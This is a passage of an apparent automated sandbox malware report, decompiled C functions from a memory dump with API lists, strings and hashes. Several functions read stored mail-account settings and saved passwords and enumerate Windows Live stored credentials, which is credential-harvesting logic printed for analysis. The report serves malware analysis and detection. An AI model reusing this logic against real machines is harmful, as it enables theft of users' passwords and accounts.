                                                              				signed int _t104;
                                                              				signed short _t107;
                                                              				signed int _t110;
                                                              				intOrPtr _t114;
                                                              				signed int _t117;
                                                              				signed int _t119;
                                                              				signed short _t121;
                                                              				signed int _t122;
                                                              				signed int _t152;
                                                              				signed int _t156;
                                                              				signed int _t158;
                                                              				signed int _t161;
                                                              				signed int _t163;
                                                              				signed int _t168;
                                                              				signed int _t169;
                                                              				signed int _t170;
                                                              				void* _t172;
                                                              				void* _t173;
                                                              				void* _t174;
                                                              				void* _t178;
                                                              				intOrPtr _t180;
                                                              
                                                              				_t174 = __eflags;
                                                              				_t172 = __eax;
                                                              				E00408572(__eax);
                                                              				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                                              				_t122 = 0xd;
                                                              				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                                              				_t156 = 0x14;
                                                              				_t96 = _t122 * _t156;
                                                              				 *(_t172 + 0x1b0) = _t122;
                                                              				_push( ~(0 | _t174 > 0x00000000) | _t96);
                                                              				L004115D0();
                                                              				 *(_t172 + 0x1b4) = _t96;
                                                              				_t158 = 0x10;
                                                              				_t98 = _t122 * _t158;
                                                              				_push( ~(0 | _t174 > 0x00000000) | _t98);
                                                              				L004115D0();
                                                              				 *(_t172 + 0x34) = _t98;
                                                              				_v8 = 0x4168e0;
                                                              				do {
                                                              					_t21 =  &_v8; // 0x4168e0
                                                              					_t99 =  *_t21;
                                                              					_t168 =  *_t99;
                                                              					_v12 = _t168;
                                                              					_t169 = _t168 * 0x14;
                                                              					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                                              					_t24 =  &_v8; // 0x4168e0
                                                              					_t104 = _v12 << 4;
                                                              					_v12 = _t104;
                                                              					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
                                                              					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                                              					_t173 = _t173 + 0x18;
                                                              					_v16 = _t107;
                                                              					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                                              					if((_t107 & 0xffff0000) == 0) {
                                                              						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
                                                              						_t121 = E004078FF(_v16 | 0x00010000);
                                                              						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                                              						_t122 = 0xd;
                                                              					}
                                                              					_v8 = _v8 + 0x24;
                                                              					_t178 = _v8 - 0x416ab4;
                                                              				} while (_t178 < 0);
                                                              				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                                              				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                                              				_t161 = 4;
                                                              				_t110 = _t122 * _t161;
                                                              				 *(_t172 + 0x20) = _t122;
                                                              				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                                              				_push( ~(0 | _t178 > 0x00000000) | _t110);
                                                              				L004115D0();
                                                              				_push(0xc);
                                                              				 *(_t172 + 0x24) = _t110;
                                                              				L004115D0();
                                                              				_t170 = _t110;
                                                              				if(_t170 == 0) {
                                                              					_t170 = 0;
                                                              					__eflags = 0;
                                                              				} else {
                                                              					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                                              					_t180 = _t114;
                                                              					_a8 = _t114;
                                                              					if(_t180 == 0) {
                                                              						_a8 = 0x64;
                                                              					}
                                                              					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                                              					_t163 = 4;
                                                              					_t117 = _t122 * _t163;
                                                              					 *(_t170 + 4) = _t122;
                                                              					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                              					L004115D0();
                                                              					_a4 = _a4 & 0x00000000;
                                                              					 *_t170 = _t117;
                                                              					do {
                                                              						_t152 = _a4;
                                                              						_t119 = _t152 << 2;
                                                              						_a4 = _a4 + 1;
                                                              						 *( *_t170 + _t119 + 2) = _t152;
                                                              						 *((short*)(_t119 +  *_t170)) = _a8;
                                                              					} while (_a4 < _t122);
                                                              				}
                                                              				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                              				 *(_t172 + 0x1a0) = _t170;
                                                              				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                              				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                              				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                              				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                              				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                              				return E004086DC(_t172);
                                                              			}

































                                                              0x0040875c
                                                              0x00408765
                                                              0x00408767
                                                              0x0040876f
                                                              0x00408775
                                                              0x00408776
                                                              0x00408780
                                                              0x00408783
                                                              0x00408788
                                                              0x00408792
                                                              0x00408793
                                                              0x00408798
                                                              0x004087a2
                                                              0x004087a5
                                                              0x004087ae
                                                              0x004087af
                                                              0x004087b6
                                                              0x004087b9
                                                              0x004087c0
                                                              0x004087c0
                                                              0x004087c0
                                                              0x004087c3
                                                              0x004087c5
                                                              0x004087c8
                                                              0x004087d7
                                                              0x004087dc
                                                              0x004087eb
                                                              0x004087f1
                                                              0x004087f4
                                                              0x004087ff
                                                              0x00408809
                                                              0x00408811
                                                              0x00408814
                                                              0x00408818
                                                              0x00408831
                                                              0x00408835
                                                              0x00408842
                                                              0x00408846
                                                              0x00408846
                                                              0x00408847
                                                              0x0040884b
                                                              0x0040884b
                                                              0x0040885b
                                                              0x0040885f
                                                              0x00408866
                                                              0x00408869
                                                              0x0040886e
                                                              0x00408871
                                                              0x0040887c
                                                              0x0040887d
                                                              0x00408882
                                                              0x00408884
                                                              0x00408887
                                                              0x0040888c
                                                              0x00408892
                                                              0x004088ee
                                                              0x004088ee
                                                              0x00408894
                                                              0x00408894
                                                              0x00408897
                                                              0x00408899
                                                              0x0040889c
                                                              0x0040889e
                                                              0x0040889e
                                                              0x004088a8
                                                              0x004088af
                                                              0x004088b2
                                                              0x004088b7
                                                              0x004088be
                                                              0x004088bf
                                                              0x004088c4
                                                              0x004088c9
                                                              0x004088cb
                                                              0x004088cb
                                                              0x004088d2
                                                              0x004088d5
                                                              0x004088db
                                                              0x004088e6
                                                              0x004088e6
                                                              0x004088ec
                                                              0x004088f0
                                                              0x004088fa
                                                              0x00408902
                                                              0x00408905
                                                              0x0040890b
                                                              0x00408911
                                                              0x00408917
                                                              0x0040892a

                                                              APIs
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                              • memcpy.MSVCRT ref: 004087D7
                                                              • memcpy.MSVCRT ref: 004087F4
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                              • String ID: d$hA
                                                              • API String ID: 3781940870-4030989184
                                                              • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                              • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                              • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                              • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				char _v188;
                                                              				char _v268;
                                                              				char _v524;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				char* _t53;
                                                              				void* _t60;
                                                              				void* _t65;
                                                              				char* _t70;
                                                              
                                                              				_v8 = _v8 & 0x00000000;
                                                              				_t65 = __eax;
                                                              				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                              				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                              				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                              				if(_v524 == 0x31) {
                                                              					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                              				}
                                                              				_v12 = _t65 + 0x110;
                                                              				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                              				_t70 = _t65 + 0x214;
                                                              				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                              				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                              				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                              				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                              				if(_v268 != 0) {
                                                              					_v188 = 0;
                                                              					E00401D5A( &_v268, _t65 + 0x294);
                                                              					if( *_t70 == 0) {
                                                              						_push(_a8);
                                                              						_t60 = 0x7f;
                                                              						_push(_t60);
                                                              						_push(_t70);
                                                              						_push("PopAccount");
                                                              						_push(_a4);
                                                              						E0040311F();
                                                              						if( *_t70 != 0) {
                                                              							_t53 = strchr(_t70, 0x40);
                                                              							_a8 = _t53;
                                                              							if(_t53 != 0) {
                                                              								E004060D0(_t60, _v12,  &(_t53[1]));
                                                              								 *_a8 = 0;
                                                              							}
                                                              						}
                                                              					}
                                                              					_v8 = 1;
                                                              				}
                                                              				if( *_t70 != 0) {
                                                              					_v8 = 1;
                                                              				}
                                                              				return _v8;
                                                              			}














                                                              0x00403156
                                                              0x00403160
                                                              0x00403177
                                                              0x00403181
                                                              0x0040318b
                                                              0x00403197
                                                              0x00403199
                                                              0x00403199
                                                              0x004031b7
                                                              0x004031ba
                                                              0x004031c2
                                                              0x004031d3
                                                              0x004031e9
                                                              0x00403202
                                                              0x0040321a
                                                              0x00403226
                                                              0x00403234
                                                              0x0040323b
                                                              0x00403243
                                                              0x00403245
                                                              0x0040324a
                                                              0x0040324b
                                                              0x0040324c
                                                              0x0040324d
                                                              0x00403252
                                                              0x00403255
                                                              0x0040325d
                                                              0x00403262
                                                              0x0040326b
                                                              0x0040326e
                                                              0x00403275
                                                              0x0040327e
                                                              0x0040327e
                                                              0x0040326e
                                                              0x0040325d
                                                              0x00403281
                                                              0x00403281
                                                              0x0040328e
                                                              0x00403290
                                                              0x00403290
                                                              0x0040329b

                                                              APIs
                                                                • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                              • strchr.MSVCRT ref: 00403262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                              • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                              • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                              • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 16%
                                                              			E0040F09D(char* __eax, void* __ecx) {
                                                              				void* _t2;
                                                              				char* _t3;
                                                              				void* _t5;
                                                              				void* _t6;
                                                              				void* _t7;
                                                              
                                                              				_t3 = __eax;
                                                              				_t6 = __ecx;
                                                              				_t5 = 4;
                                                              				while(1) {
                                                              					_t2 =  *_t3;
                                                              					if(_t2 != 0x3c) {
                                                              						goto L3;
                                                              					}
                                                              					_push(_t5);
                                                              					_push("&lt;");
                                                              					L14:
                                                              					_t2 = memcpy(_t6, ??, ??);
                                                              					_t7 = _t7 + 0xc;
                                                              					_t6 = _t6 + _t5;
                                                              					L16:
                                                              					if( *_t3 != 0) {
                                                              						_t3 = _t3 + 1;
                                                              						continue;
                                                              					}
                                                              					return _t2;
                                                              					L3:
                                                              					if(_t2 != 0x3e) {
                                                              						if(_t2 != 0x22) {
                                                              							if(_t2 != 0xb0) {
                                                              								if(_t2 != 0x26) {
                                                              									if(_t2 != 0xa) {
                                                              										 *_t6 = _t2;
                                                              										_t6 = _t6 + 1;
                                                              									} else {
                                                              										_push(_t5);
                                                              										_push("<br>");
                                                              										goto L14;
                                                              									}
                                                              								} else {
                                                              									_push(5);
                                                              									_push("&amp;");
                                                              									goto L11;
                                                              								}
                                                              							} else {
                                                              								_push(5);
                                                              								_push("&deg;");
                                                              								L11:
                                                              								_t2 = memcpy(_t6, ??, ??);
                                                              								_t7 = _t7 + 0xc;
                                                              								_t6 = _t6 + 5;
                                                              							}
                                                              						} else {
                                                              							_t2 = memcpy(_t6, "&quot;", 6);
                                                              							_t7 = _t7 + 0xc;
                                                              							_t6 = _t6 + 6;
                                                              						}
                                                              					} else {
                                                              						_push(_t5);
                                                              						_push("&gt;");
                                                              						goto L14;
                                                              					}
                                                              					goto L16;
                                                              				}
                                                              			}








                                                              0x0040f0a2
                                                              0x0040f0a4
                                                              0x0040f0a6
                                                              0x0040f0a7
                                                              0x0040f0a7
                                                              0x0040f0ab
                                                              0x00000000
                                                              0x00000000
                                                              0x0040f0ad
                                                              0x0040f0ae
                                                              0x0040f10a
                                                              0x0040f10b
                                                              0x0040f110
                                                              0x0040f113
                                                              0x0040f11a
                                                              0x0040f11d
                                                              0x0040f11f
                                                              0x00000000
                                                              0x0040f11f
                                                              0x0040f125
                                                              0x0040f0b5
                                                              0x0040f0b7
                                                              0x0040f0c3
                                                              0x0040f0dc
                                                              0x0040f0e9
                                                              0x0040f102
                                                              0x0040f117
                                                              0x0040f119
                                                              0x0040f104
                                                              0x0040f104
                                                              0x0040f105
                                                              0x00000000
                                                              0x0040f105
                                                              0x0040f0eb
                                                              0x0040f0eb
                                                              0x0040f0ed
                                                              0x00000000
                                                              0x0040f0ed
                                                              0x0040f0de
                                                              0x0040f0de
                                                              0x0040f0e0
                                                              0x0040f0f2
                                                              0x0040f0f3
                                                              0x0040f0f8
                                                              0x0040f0fb
                                                              0x0040f0fb
                                                              0x0040f0c5
                                                              0x0040f0cd
                                                              0x0040f0d2
                                                              0x0040f0d5
                                                              0x0040f0d5
                                                              0x0040f0b9
                                                              0x0040f0b9
                                                              0x0040f0ba
                                                              0x00000000
                                                              0x0040f0ba
                                                              0x00000000
                                                              0x0040f0b7

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                              • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                              • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                              • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E0040D865(intOrPtr* _a4) {
                                                              				char _v260;
                                                              				char _v516;
                                                              				void _v771;
                                                              				char _v772;
                                                              				intOrPtr _v776;
                                                              				intOrPtr _v780;
                                                              				intOrPtr _v788;
                                                              				int _v796;
                                                              				char _v800;
                                                              				signed int _v804;
                                                              				char _v808;
                                                              				char _v812;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t52;
                                                              				void* _t53;
                                                              				void* _t57;
                                                              				signed int _t58;
                                                              				char* _t65;
                                                              				unsigned int _t68;
                                                              				intOrPtr _t69;
                                                              				void* _t85;
                                                              				char* _t89;
                                                              				intOrPtr _t92;
                                                              				intOrPtr* _t93;
                                                              				signed int _t94;
                                                              				void* _t96;
                                                              
                                                              				_t52 = _a4;
                                                              				_t96 = (_t94 & 0xfffffff8) - 0x32c;
                                                              				_push(_t85);
                                                              				 *((intOrPtr*)(_t52 + 4)) = 0;
                                                              				 *((intOrPtr*)(_t52 + 8)) = 0;
                                                              				_t89 = 0;
                                                              				_t53 = E00406278();
                                                              				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
                                                              				if( *((intOrPtr*)(_t53 + 4)) > 5) {
                                                              					_t89 = L"WindowsLive:name=*";
                                                              				}
                                                              				_v800 = 0;
                                                              				_v796 = 0;
                                                              				if(E00404647( &_v800, _t85, _t97) == 0) {
                                                              					L21:
                                                              					return E004046C2( &_v800);
                                                              				}
                                                              				_v808 = 0;
                                                              				_v812 = 0;
                                                              				if(_v780 == 0) {
                                                              					_t57 = 0;
                                                              					__eflags = 0;
                                                              				} else {
                                                              					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
                                                              				}
                                                              				if(_t57 == 0) {
                                                              					goto L21;
                                                              				} else {
                                                              					_t58 = 0;
                                                              					_v804 = 0;
                                                              					if(_v812 <= 0) {
                                                              						L20:
                                                              						_v788(_v808);
                                                              						goto L21;
                                                              					} else {
                                                              						do {
                                                              							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
                                                              							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                                                              								_v772 = 0;
                                                              								memset( &_v771, 0, 0xff);
                                                              								_t96 = _t96 + 0xc;
                                                              								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                                                              									_push(0x11);
                                                              									_t65 =  &_v772;
                                                              									_push("windowslive:name=");
                                                              									_push(_t65);
                                                              									L00411612();
                                                              									_t96 = _t96 + 0xc;
                                                              									if(_t65 == 0) {
                                                              										_v516 = 0;
                                                              										_v260 = 0;
                                                              										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                                                              										_t68 =  *(_t92 + 0x18);
                                                              										if(_t68 > 0) {
                                                              											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                                              											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                              										}
                                                              										if(_v260 == 0) {
                                                              											_t69 = _a4;
                                                              											_t44 = _t69 + 8;
                                                              											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                              											__eflags =  *_t44;
                                                              										} else {
                                                              											_t93 = _a4;
                                                              											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                              											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              							_t58 = _v804 + 1;
                                                              							_v804 = _t58;
                                                              						} while (_t58 < _v812);
                                                              						goto L20;
                                                              					}
                                                              				}
                                                              			}






























                                                              0x0040d86b
                                                              0x0040d86e
                                                              0x0040d878
                                                              0x0040d879
                                                              0x0040d87c
                                                              0x0040d87f
                                                              0x0040d881
                                                              0x0040d886
                                                              0x0040d88a
                                                              0x0040d88c
                                                              0x0040d88c
                                                              0x0040d895
                                                              0x0040d899
                                                              0x0040d8a4
                                                              0x0040d9e7
                                                              0x0040d9f6
                                                              0x0040d9f6
                                                              0x0040d8ae
                                                              0x0040d8b2
                                                              0x0040d8b6
                                                              0x0040d8ca
                                                              0x0040d8ca
                                                              0x0040d8b8
                                                              0x0040d8c4
                                                              0x0040d8c4
                                                              0x0040d8ce
                                                              0x00000000
                                                              0x0040d8d4
                                                              0x0040d8d4
                                                              0x0040d8da
                                                              0x0040d8de
                                                              0x0040d9df
                                                              0x0040d9e3
                                                              0x00000000
                                                              0x0040d8e4
                                                              0x0040d8e9
                                                              0x0040d8ed
                                                              0x0040d8f4
                                                              0x0040d913
                                                              0x0040d917
                                                              0x0040d91c
                                                              0x0040d936
                                                              0x0040d93c
                                                              0x0040d93e
                                                              0x0040d942
                                                              0x0040d947
                                                              0x0040d948
                                                              0x0040d94d
                                                              0x0040d952
                                                              0x0040d964
                                                              0x0040d96d
                                                              0x0040d974
                                                              0x0040d97a
                                                              0x0040d97f
                                                              0x0040d994
                                                              0x0040d99f
                                                              0x0040d99f
                                                              0x0040d9ad
                                                              0x0040d9c6
                                                              0x0040d9c9
                                                              0x0040d9c9
                                                              0x0040d9c9
                                                              0x0040d9af
                                                              0x0040d9af
                                                              0x0040d9be
                                                              0x0040d9c1
                                                              0x0040d9c1
                                                              0x0040d9ad
                                                              0x0040d952
                                                              0x0040d936
                                                              0x0040d9d0
                                                              0x0040d9d5
                                                              0x0040d9d5
                                                              0x00000000
                                                              0x0040d8e9
                                                              0x0040d8de

                                                              APIs
                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                              • memset.MSVCRT ref: 0040D917
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                              • _strnicmp.MSVCRT ref: 0040D948
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                              • API String ID: 945165440-3589380929
                                                              • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                              • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                              • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                              • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				void _v4359;
                                                              				char _v4360;
                                                              				int _t17;
                                                              				CHAR* _t26;
                                                              
                                                              				E004118A0(0x1104, __ecx);
                                                              				_v4360 = 0;
                                                              				memset( &_v4359, 0, 0x1000);
                                                              				_t17 = GetDlgCtrlID(_a4);
                                                              				_t35 = _t17;
                                                              				GetWindowTextA(_a4,  &_v4360, 0x1000);
                                                              				if(_t17 > 0 && _v4360 != 0) {
                                                              					_v260 = 0;
                                                              					memset( &_v259, 0, 0xff);
                                                              					GetClassNameA(_a4,  &_v260, 0xff);
                                                              					_t26 =  &_v260;
                                                              					_push("sysdatetimepick32");
                                                              					_push(_t26);
                                                              					L004115B2();
                                                              					if(_t26 != 0) {
                                                              						E00407EC3(_t35,  &_v4360);
                                                              					}
                                                              				}
                                                              				return 1;
                                                              			}









                                                              0x00407ff3
                                                              0x0040800b
                                                              0x00408011
                                                              0x0040801c
                                                              0x00408022
                                                              0x0040802f
                                                              0x00408037
                                                              0x0040804f
                                                              0x00408055
                                                              0x00408068
                                                              0x0040806e
                                                              0x00408074
                                                              0x00408079
                                                              0x0040807a
                                                              0x00408083
                                                              0x0040808d
                                                              0x00408093
                                                              0x00408083
                                                              0x0040809b

                                                              APIs
                                                              • memset.MSVCRT ref: 00408011
                                                              • GetDlgCtrlID.USER32 ref: 0040801C
                                                              • GetWindowTextA.USER32 ref: 0040802F
                                                              • memset.MSVCRT ref: 00408055
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                              • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 896699463-4169760276
                                                              • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                              • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                              • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                              • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				void* __esi;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				signed int _t76;
                                                              				signed int _t89;
                                                              				signed int _t90;
                                                              				void* _t98;
                                                              				void* _t101;
                                                              				short* _t118;
                                                              				unsigned int _t126;
                                                              				intOrPtr _t128;
                                                              				signed int _t131;
                                                              				void* _t144;
                                                              				intOrPtr* _t146;
                                                              				short _t153;
                                                              				signed int _t155;
                                                              
                                                              				_t129 = __ecx;
                                                              				_push(__ecx);
                                                              				_t74 = _a4 - 0x4e;
                                                              				_t155 = __ecx;
                                                              				if(_t74 == 0) {
                                                              					_t146 = _a12;
                                                              					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
                                                              					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
                                                              						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                              						if(__eflags == 0) {
                                                              							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
                                                              						}
                                                              					}
                                                              					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
                                                              					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
                                                              						L27:
                                                              						_t75 = 0;
                                                              						__eflags = 0;
                                                              						goto L28;
                                                              					} else {
                                                              						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                              						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                                                              							goto L27;
                                                              						}
                                                              						_t76 =  *(_t146 + 0x14);
                                                              						__eflags = _t76 & 0x00000002;
                                                              						if((_t76 & 0x00000002) == 0) {
                                                              							L36:
                                                              							_t131 =  *(_t146 + 0x18) ^ _t76;
                                                              							__eflags = 0x0000f000 & _t131;
                                                              							if((0x0000f000 & _t131) == 0) {
                                                              								L39:
                                                              								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                              								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                              									goto L27;
                                                              								}
                                                              								__eflags =  *(_t146 + 0x18) & 0x00000002;
